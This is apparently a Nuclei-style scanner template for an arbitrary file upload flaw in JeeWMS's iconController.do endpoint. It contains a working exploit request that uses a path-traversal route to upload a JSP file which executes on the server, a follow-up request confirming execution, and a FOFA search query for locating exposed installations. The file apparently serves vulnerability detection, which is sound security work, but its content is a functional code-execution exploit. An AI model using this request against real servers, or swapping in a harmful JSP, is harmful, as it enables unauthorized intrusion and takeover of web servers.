http:
    - raw:
        - |
          POST /rest/../iconController.do?saveOrUpdateIcon HTTP/1.1
          Host: {{Hostname}}
          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.6478.57 Safari/537.36
          Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryHRhkXyQjTSAk8j8c

          ------WebKitFormBoundaryHRhkXyQjTSAk8j8c
          Content-Disposition: form-data; name="name"; filename="{{username}}.jsp"
          Content-Type: image/png

          <% out.println("pboyjnnrfipmplsukdeczudsefxmywe"); new java.io.File(application.getRealPath(request.getServletPath())).delete(); %>
          ------WebKitFormBoundaryHRhkXyQjTSAk8j8c--
    - matchers:
        - part: body
          type: word
          words:
            - pboyjnnrfipmplsukdeczudsefxmywe
        - status:
            - 200
          type: status
      matchers-condition: and
      raw:
        - |
          GET /plug-in/accordion/images/{{username}}.jsp HTTP/1.1
          Host: {{Hostname}}
id: JeeWMS-iconController_do-File-upload
info:
    author: Superhero
    description: |-
        fofa: body="url:userController.do?userOrgSelect&userId=" && "loginController.do?changeDefaultOrg"
        JeeWMS iconController.do 接口存在任意文件上传漏洞，未经身份攻击者可通过该漏洞在服务器端任意执行代码，写入后门，获取服务器权限，进而控制整个 web 服务器。
    name: JeeWMS iconController.do 任意文件上传漏洞
    reference:
        - https://mp.weixin.qq.com/s/yS5Oi1C3-XHKlG98sc1xIw
    severity: high
    tags: []
variables:
    username: '{{to_lower(rand_base(6))}}'
